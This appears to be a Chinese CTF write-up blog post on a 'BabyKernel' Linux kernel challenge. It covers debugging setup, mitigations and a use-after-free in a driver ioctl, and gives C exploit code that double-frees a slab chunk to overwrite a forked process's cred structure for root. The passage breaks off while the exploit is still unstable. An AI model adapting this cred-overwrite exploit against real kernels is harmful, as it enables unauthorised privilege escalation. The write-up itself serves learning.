<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
<title>Linux Kernel 初探（一）BabyKernel - P1umerのblog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



    <meta name="description" content="Intro: Linux Kernel 的第一次探索">
<meta name="keywords" content="Kernel">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux Kernel 初探（一）BabyKernel">
<meta property="og:url" content="http://p1umer.gituhb.io/2019/05/30/Linux Kernel 初探/index.html">
<meta property="og:site_name" content="P1umerのblog">
<meta property="og:description" content="Intro: Linux Kernel 的第一次探索">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/PeruvianRainforest_ZH-CN4066508593_1920x1080.jpg">
<meta property="og:updated_time" content="2019-07-04T15:38:46.747Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux Kernel 初探（一）BabyKernel">
<meta name="twitter:description" content="Intro: Linux Kernel 的第一次探索">
<meta name="twitter:image" content="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/PeruvianRainforest_ZH-CN4066508593_1920x1080.jpg">







<link rel="icon" href="/images/111.png">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
    
    <style>body>.footer,body>.navbar,body>.section{opacity:0}</style>
    

    
    
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">
    

    
    

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">


    
    
    
    

<link rel="stylesheet" href="/css/back-to-top.css">


    
    

    
    
    
    

    
    
<link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

    
    
    

    
    
    


<link rel="stylesheet" href="/css/style.css">
</head>
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/111.png" alt="Linux Kernel 初探（一）BabyKernel" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item" href="/">Home</a>
                
                <a class="navbar-item" href="/archives">Archives</a>
                
                <a class="navbar-item" href="/categories">Categories</a>
                
                <a class="navbar-item" href="/tags">Tags</a>
                
                <a class="navbar-item" href="/about">About</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    
                    <a class="navbar-item" target="_blank" title="github" href="https://github.com/p1umer">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                
                <a class="navbar-item search" title="Search" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-6-widescreen has-order-2 column-main"><div class="card">
    
    <div class="card-image">
        <span class="image is-7by1">
            <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/PeruvianRainforest_ZH-CN4066508593_1920x1080.jpg" alt="Linux Kernel 初探（一）BabyKernel">
        </span>
    </div>
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2019-05-30T14:04:29.000Z">2019-05-30</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/Linux-Kernel/">Linux Kernel</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    23 minutes read (About 3423 words)
                </span>
                
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                Linux Kernel 初探（一）BabyKernel
            
        </h1>
        <div class="content">
            <h2><span id="intro-linux-kernel-的第一次探索">Intro: Linux Kernel 的第一次探索</span></h2> <a id="more"></a>
<h2><span id="写在前面">写在前面</span></h2><p>【+】本文首发于安全客 <a href="https://www.anquanke.com/post/id/179161" target="_blank" rel="noopener">https://www.anquanke.com/post/id/179161</a> </p>
<h2><span id="相关链接">相关链接</span></h2><p>【+】题目：<a href="https://drive.google.com/open?id=1B5EKTB3c2sYHg26f_tvxejrP0HFzj1Qi" target="_blank" rel="noopener">https://drive.google.com/open?id=1B5EKTB3c2sYHg26f_tvxejrP0HFzj1Qi</a><br>【+】 <a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/basic_knowledge/" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/basic_knowledge/</a><br>【+】 <a href="http://p4nda.top" target="_blank" rel="noopener">http://p4nda.top</a><br>【+】 <a href="https://sunichi.github.io" target="_blank" rel="noopener">https://sunichi.github.io</a></p>
<h2><span id="题目描述">题目描述</span></h2><p>解压<a href="https://drive.google.com/open?id=1B5EKTB3c2sYHg26f_tvxejrP0HFzj1Qi" target="_blank" rel="noopener">题目</a>我们可以拿到以下文件:<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">p1umer@ubuntu:~/kernel/give_to_player$ ls -l</span><br><span class="line">total 5516</span><br><span class="line">-rwxr-xr-x 1 p1umer p1umer     202 May  9 00:09 boot.sh</span><br><span class="line">-rw-r--r-- 1 p1umer p1umer 4127776 May  9 00:09 bzImage</span><br><span class="line">-rw-r--r-- 1 p1umer p1umer 1514482 May  9 04:35 initramfs.img</span><br></pre></td></tr></table></figure></p>
<p>将initramfs.img后缀改为.cpio后用ubuntu再次解压可以得到如下文件：<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515013157.png" alt></p>
<p>在poc文件夹内找到tshop.ko文件，使用IDA分析：<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515013311.png" alt></p>
<p>其中可以观察到，主要函数有三个：</p>
<ul>
<li>tshop-ioctl</li>
<li>tshop-init</li>
<li>tshop-exit</li>
</ul>
<p>其中核心函数是 tshop-ioctl 需要重点分析，我们后面会具体分析这个函数</p>
<h2><span id="调试以及数据交互">调试以及数据交互</span></h2><h3><span id="程序启动以及调试">程序启动以及调试</span></h3><p>题目包含了一个 qemu 的启动脚本如下：<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -kernel bzImage \</span><br><span class="line">    -nographic \</span><br><span class="line">    -append &quot;rdinit=/linuxrc console=ttyS0 oops=panic panic=1&quot; \</span><br><span class="line">    -m 128M \</span><br><span class="line">    -cpu qemu64,smap,smep -initrd initramfs.img \</span><br><span class="line">    -smp cores=1,threads=1 2&gt;/dev/null \</span><br></pre></td></tr></table></figure></p>
<p>可以看到其中如果选择开启kaslr则需要在 -append 选项后面加上kaslr即可<br>如果选择gdb调试，则需要加上：<code>-gdb tcp::4869 -S</code> （其中-S为挂起等待），对应的gdb脚本：<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">gdb \</span><br><span class="line">    -ex &quot;add-auto-load-safe-path $(pwd)&quot; \</span><br><span class="line">    -ex &quot;file vmlinux&quot; \</span><br><span class="line">    -ex &apos;set arch i386:x86-64:intel&apos; \</span><br><span class="line">    -ex &apos;target remote localhost:4869&apos; \</span><br><span class="line">    -ex &apos;continue&apos; \</span><br><span class="line">    -ex &apos;disconnect&apos; \</span><br><span class="line">    -ex &apos;set arch i386:x86-64&apos; \</span><br><span class="line">    -ex &apos;target remote localhost:4869&apos;</span><br></pre></td></tr></table></figure></p>
<h3><span id="exp编写以及数据交互">EXP编写以及数据交互</span></h3><p>Kernel Pwn 如何和驱动模块进行交互呢？</p>
<p>驱动处理预期流程是：</p>
<ul>
<li>用户态调用驱动触发状态切换</li>
<li>进入内核态内核态响应用户请求</li>
<li>处理数据返回结果</li>
<li>切换回用户态</li>
</ul>
<p>那么如何在用户态调用驱动呢？</p>
<p>首先，对一个字符设备而言有如下结构体：<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">struct file_operations d_fops = &#123;</span><br><span class="line">	.owner = THIS_MODULE,</span><br><span class="line">	.open = d_open,</span><br><span class="line">	.read = d_read,</span><br><span class="line">	.write = d_write,</span><br><span class="line">	.ioctl = d_ioctl,</span><br><span class="line">	.release = d_release,</span><br><span class="line">	&#125;;</span><br></pre></td></tr></table></figure></p>
<p>该结构体展示了部分文件操作对应的函数指针。如读该设备时会调用d_open函数。从该结构体我们可以看出其实现了用户与内核驱动交互的接口，同时也就自然成为了内核攻击面之一。具体的调用方法为：<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">int main(int argc, char *argv[])&#123;</span><br><span class="line">    int fd = open(&quot;/dev/tshop&quot;,0);</span><br><span class="line">    //debug();</span><br><span class="line">    ioctl(fd,MALLOC,0);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></p>
<ul>
<li>fd打开设备</li>
<li>通过ioctl进行具体的交互（或者该驱动注册的其他处理函数）</li>
</ul>
<p>好了，可以实现和驱动模块的交互后，我们就可以用c语言来编写相应的exploit了。但是在这之前，我们先了解一下内核的一些保护模式</p>
<h2><span id="缓释机制">缓释机制</span></h2><h3><span id="mmap_min_addr">mmap_min_addr</span></h3><p>指定用户进程通过mmap可使用的最小虚拟内存地址，以避免其在低地址空间产生映射导致安全问题。</p>
<h3><span id="kptr_restrict-dmesg_restrict">kptr_restrict / dmesg_restrict</span></h3><p>在linux内核漏洞利用中常常使用commit_creds和prepare_kernel_cred来完成提权，它们的地址可以从/proc/kallsyms中读取。/proc/sys/kernel/kptr_restrict被默认设置为1以阻止通过这种方式泄露内核地址。dmesg_restrict限制非特权读dmesg（Restrict unprivileged access to kernel syslog）</p>
<h3><span id="smepsmap">SMEP/SMAP</span></h3><p>SMEP(Supervisor Mode Execution Prevention，管理模式执行保护)和SMAP(Supervisor Mode Access Prevention，管理模式访问保护)，其作用分别是禁止内核执行用户空间的代码和禁止内核访问用户空间的数据。</p>
<h2><span id="程序分析">程序分析</span></h2><p>前面提到，ida打开.ko文件得到如下内容：<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515013340.png" alt><br>可以得到如下信息：</p>
<ul>
<li>程序实现了kmalloc；kfree；edit1；edit2</li>
<li>程序维护了一个BUY_LIST用来存放kmen_cache_alloc分配的堆块</li>
<li>malloc的时候会把堆块写成特定值</li>
<li>两个edit函数改指针为固定值</li>
<li>有一个看起来没有参数的 kfree</li>
</ul>
<p>等等，kfree没有参数？让我们仔细分析它：<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515013412.png" alt><br>嗯，参数还是有的。但是这里面在释放完毕BUY_LIST里的堆块之后并没有清空，也就是说我们得到了一个UAF!</p>
<h2><span id="调试判断-cred-结构体大小">调试判断 Cred 结构体大小</span></h2><p>若要达到提权权限，则需要修改权限信息。kernel记录了线程的权限，更具体的，是用 cred 结构体记录的，每个线程中都有一个cred结构，这个结构保存了该进程的权限等信息（uid，gid等），如果能修改某个进程的cred，那么也就修改了这个进程的权限。所以我们需要得到Cred结构体大小，以便为后面的 exploit 拓展思路。</p>
<p>首先打开源码查看cred结构体定义<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">struct cred &#123;</span><br><span class="line">    atomic_t    usage;</span><br><span class="line">#ifdef CONFIG_DEBUG_CREDENTIALS</span><br><span class="line">    atomic_t    subscribers;    /* number of processes subscribed */</span><br><span class="line">    void        *put_addr;</span><br><span class="line">    unsigned    magic;</span><br><span class="line">#define CRED_MAGIC    0x43736564</span><br><span class="line">#define CRED_MAGIC_DEAD    0x44656144</span><br><span class="line">#endif</span><br><span class="line">    uid_t        uid;        /* real UID of the task */</span><br><span class="line">    gid_t        gid;        /* real GID of the task */</span><br><span class="line">    uid_t        suid;        /* saved UID of the task */</span><br><span class="line">    gid_t        sgid;        /* saved GID of the task */</span><br><span class="line">    uid_t        euid;        /* effective UID of the task */</span><br><span class="line">    gid_t        egid;        /* effective GID of the task */</span><br><span class="line">    uid_t        fsuid;        /* UID for VFS ops */</span><br><span class="line">    gid_t        fsgid;        /* GID for VFS ops */</span><br><span class="line">    unsigned    securebits;    /* SUID-less security management */</span><br><span class="line">    kernel_cap_t    cap_inheritable; /* caps our children can inherit */</span><br><span class="line">    kernel_cap_t    cap_permitted;    /* caps we&apos;re permitted */</span><br><span class="line">    kernel_cap_t    cap_effective;    /* caps we can actually use */</span><br><span class="line">    kernel_cap_t    cap_bset;    /* capability bounding set */</span><br><span class="line">#ifdef CONFIG_KEYS</span><br><span class="line">    unsigned char    jit_keyring;    /* default keyring to attach requested</span><br><span class="line">                     * keys to */</span><br><span class="line">    struct key    *thread_keyring; /* keyring private to this thread */</span><br><span class="line">    struct key    *request_key_auth; /* assumed request_key authority */</span><br><span class="line">    struct thread_group_cred *tgcred; /* thread-group shared credentials */</span><br><span class="line">#endif</span><br><span class="line">#ifdef CONFIG_SECURITY</span><br><span class="line">    void        *security;    /* subjective LSM security */</span><br><span class="line">#endif</span><br><span class="line">    struct user_struct *user;    /* real user ID subscription */</span><br><span class="line">    struct user_namespace *user_ns; /* cached user-&gt;user_ns */</span><br><span class="line">    struct group_info *group_info;    /* supplementary groups for euid/fsgid */</span><br><span class="line">    struct rcu_head    rcu;        /* RCU deletion hook */</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p>emmm，直接判断大小貌似有点困难，调试一下好了。<br>注意,由于系统开启了kptr_restrict，我们无法看到一些地址信息，所以我们需要关闭。<br>【关闭 kptr_restrict】：修改解压后的 /etc/.init/rcS 文件中的<br><code>echo 1 &gt; /proc/sys/kernel/kptr_restrict</code> 为 <code>echo 0 &gt; /proc/sys/kernel/kptr_restrict</code> </p>
<p>这时候就可以得到一些我们感兴趣的地址：<br>【kmem_cache_alloc】：<code>cat /proc/kallsyms |grep kmem_cache_alloc</code><br>【kfree】：<code>cat /proc/kallsyms |grep kfree</code><br>【prepare_cred】：<code>cat /proc/kallsyms | grep prepare_cred</code><br>【tshop的bss地址】：<code>cat /sys/module/tshop/sections/.bss</code></p>
<p>另外，我们在用户态执行fork函数的时候，可以调用内核prepare_cred来创建cred结构体提供给新进程的新线程。</p>
<p>所以我们编写一个简单的demo.c:<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">/*</span><br><span class="line"> * main.c</span><br><span class="line"> * Copyright (C) 2019 P1umer &lt;cz18811105578@gmail.com&gt;</span><br><span class="line"> *</span><br><span class="line"> */</span><br><span class="line">// gcc exp.c -o exp --static -lpthread</span><br><span class="line">#define _GNU_SOURCE</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;sys/ioctl.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;sys/types.h&gt;</span><br><span class="line">#include &lt;sys/stat.h&gt;</span><br><span class="line">#include &lt;fcntl.h&gt;</span><br><span class="line">#include &lt;sys/mman.h&gt;</span><br><span class="line">#include &lt;poll.h&gt;</span><br><span class="line">#include &lt;pthread.h&gt;</span><br><span class="line">#include &lt;errno.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;signal.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;sys/syscall.h&gt;</span><br><span class="line">#include &lt;linux/userfaultfd.h&gt;</span><br><span class="line">#include &lt;pthread.h&gt;</span><br><span class="line">#include &lt;poll.h&gt;</span><br><span class="line">#include &lt;linux/prctl.h&gt;</span><br><span class="line">#include &lt;stdint.h&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#define MALLOC 0x271A</span><br><span class="line">#define FREE   0x2766</span><br><span class="line">#define EDIT1  0x1A0A</span><br><span class="line">#define EDIT2  0x22B8 </span><br><span class="line">pid_t pid;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">void debug()&#123;</span><br><span class="line">    getchar();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main(int argc, char *argv[])&#123;</span><br><span class="line">    int fd = open(&quot;/dev/tshop&quot;,0);</span><br><span class="line">    debug();</span><br><span class="line">    ioctl(fd,MALLOC,0);</span><br><span class="line">    fork()；</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>【编译】：<code>gcc exp.c -o exp --static -lpthread</code><br>【打包】：打包命令为：<code>find . | cpio -o --format=newc &gt; ../initramfs.img</code></p>
<p>值得注意的是，我们因为调试的是内核，在内核中有很多的kmem_cache_alloc &amp;&amp; prepare_cred &amp;&amp; kfree 调用，因此我们只希望在 poc 调用内核这些函数的时候进行下断调试，因此getchar()是必要的。</p>
<p>启动 gdb+qemu 调试，断在 prepare_cred：<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515182753.png" alt><br>调用了<code>0xffffffff810d3251</code>，查看函数名：<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ cat /proc/kallsyms | grep &quot;ffffffff810d3251&quot; </span><br><span class="line">ffffffff810d3251 T kmem_cache_alloc</span><br></pre></td></tr></table></figure></p>
<p>可以看到 prepare_cred 函数实际调用了 kmem_cache_alloc 来申请cred的空间，大小通过 $rsi 传参，为 0xd0。惊奇的发现，居然和我们ioctl操作中kmem_cache_alloc申请的大小一致 :)</p>
<h2><span id="exploit">Exploit</span></h2><p>上面提到有了一个UAF并且cred结构体大小和驱动malloc操作申请的堆块大小一致，那么接下来的事情就好办多了，在这之前先了解一下kernel里面的memory_management：</p>
<p>【+】<a href="http://www.wowotech.net/memory_management/247.html" target="_blank" rel="noopener">http://www.wowotech.net/memory_management/247.html</a></p>
<p>slab分配器的管理手段类似于 Glibc 中的 FastbinY。如果free链表内的chunk大小和该内核版本的 cred 结构体大小相同，那么会把free链表中的chunk解链返回给 cred。</p>
<p>于是我们就可以通过doublefree来进行提权：</p>
<ul>
<li>doublefree</li>
<li>得到cred结构体后通过两次malloc修改cred结构体中的值为特定的值（上面的ida分析有提到），恰好可以达到 root 要求</li>
</ul>
<p>这个地方遇到了一点困难：由于驱动的堆内存和内核的内存是共享的，在得到 cred 的同时会把cred的信息写入该内存，也就是说</p>
<ul>
<li>在我们准备doublefree之前：<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515013433.png" alt></li>
<li>把cred写入最末尾的chunk<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515013449.png" alt></li>
</ul>
<p>内核下一次申请的时候就会申请到非法地址，PANIC!<br>但是如果我们在系统申请非法地址之前讲free链表扩充到足够大是不是就可以缓解呢系统迟一点申请到非法地址呢? 我们来试一试：<br>编写exp.c(ugly code):<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line">/*</span><br><span class="line"> * main.c</span><br><span class="line"> * Copyright (C) 2019 P1umer &lt;cz18811105578@gmail.com&gt;</span><br><span class="line"> *</span><br><span class="line"> */</span><br><span class="line">// gcc exp.c -o exp --static -lpthread</span><br><span class="line">#define _GNU_SOURCE</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;sys/ioctl.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;sys/types.h&gt;</span><br><span class="line">#include &lt;sys/stat.h&gt;</span><br><span class="line">#include &lt;fcntl.h&gt;</span><br><span class="line">#include &lt;sys/mman.h&gt;</span><br><span class="line">#include &lt;poll.h&gt;</span><br><span class="line">#include &lt;pthread.h&gt;</span><br><span class="line">#include &lt;errno.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;signal.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;sys/syscall.h&gt;</span><br><span class="line">#include &lt;linux/userfaultfd.h&gt;</span><br><span class="line">#include &lt;pthread.h&gt;</span><br><span class="line">#include &lt;poll.h&gt;</span><br><span class="line">#include &lt;linux/prctl.h&gt;</span><br><span class="line">#include &lt;stdint.h&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#define MALLOC 0x271A</span><br><span class="line">#define FREE   0x2766</span><br><span class="line">#define EDIT1  0x1A0A</span><br><span class="line">#define EDIT2  0x22B8 </span><br><span class="line">pid_t pid;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">void debug()&#123;</span><br><span class="line">    getchar();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main(int argc, char *argv[])&#123;</span><br><span class="line">    int fd = open(&quot;/dev/tshop&quot;,0);</span><br><span class="line">    debug();</span><br><span class="line"></span><br><span class="line">    ioctl(fd,MALLOC,0);</span><br><span class="line">    ioctl(fd,MALLOC,1);</span><br><span class="line">    ioctl(fd,MALLOC,2);</span><br><span class="line">    ioctl(fd,MALLOC,3);</span><br><span class="line">    ioctl(fd,MALLOC,4);</span><br><span class="line">    ioctl(fd,MALLOC,5);</span><br><span class="line">    ioctl(fd,MALLOC,6);</span><br><span class="line">    ioctl(fd,MALLOC,7);</span><br><span class="line">    ioctl(fd,MALLOC,8);</span><br><span class="line">    ioctl(fd,MALLOC,9);</span><br><span class="line">    ioctl(fd,MALLOC,10);</span><br><span class="line">    ioctl(fd,MALLOC,11);</span><br><span class="line">    ioctl(fd,MALLOC,12);</span><br><span class="line">    ioctl(fd,MALLOC,13);</span><br><span class="line">    ioctl(fd,MALLOC,14);</span><br><span class="line">    ioctl(fd,MALLOC,15);</span><br><span class="line">    ioctl(fd,MALLOC,16);</span><br><span class="line">    ioctl(fd,MALLOC,17);</span><br><span class="line">    </span><br><span class="line">    ioctl(fd,FREE,17);</span><br><span class="line">    ioctl(fd,FREE,16);</span><br><span class="line">    ioctl(fd,FREE,17);</span><br><span class="line"></span><br><span class="line">    pid=fork();</span><br><span class="line">    if(pid==0)&#123;</span><br><span class="line">        printf(&quot;[+] root?&quot;);</span><br><span class="line">        system(&quot;whoami&quot;);</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">            ioctl(fd,MALLOC,16);</span><br><span class="line">            ioctl(fd,MALLOC,17);//cred==0 </span><br><span class="line"></span><br><span class="line">            ioctl(fd,FREE,0);</span><br><span class="line">            ioctl(fd,FREE,1);</span><br><span class="line">            ioctl(fd,FREE,2);</span><br><span class="line">            ioctl(fd,FREE,3);</span><br><span class="line">            ioctl(fd,FREE,4);</span><br><span class="line">            ioctl(fd,FREE,5);</span><br><span class="line">            ioctl(fd,FREE,6);</span><br><span class="line">            ioctl(fd,FREE,7);</span><br><span class="line">            ioctl(fd,FREE,8);</span><br><span class="line">            ioctl(fd,FREE,9);</span><br><span class="line">            ioctl(fd,FREE,10);</span><br><span class="line">            ioctl(fd,FREE,11);</span><br><span class="line">            ioctl(fd,FREE,12);</span><br><span class="line">            ioctl(fd,FREE,13);</span><br><span class="line">            ioctl(fd,FREE,14);</span><br><span class="line">            ioctl(fd,FREE,15);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>输出结果：<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515013511.png" alt></p>
<p>貌似已经提权成功了。这种方法确实奏效，但是当我多执行一些指令的时候内核又会panic :(<br>怎么办呢？</p>
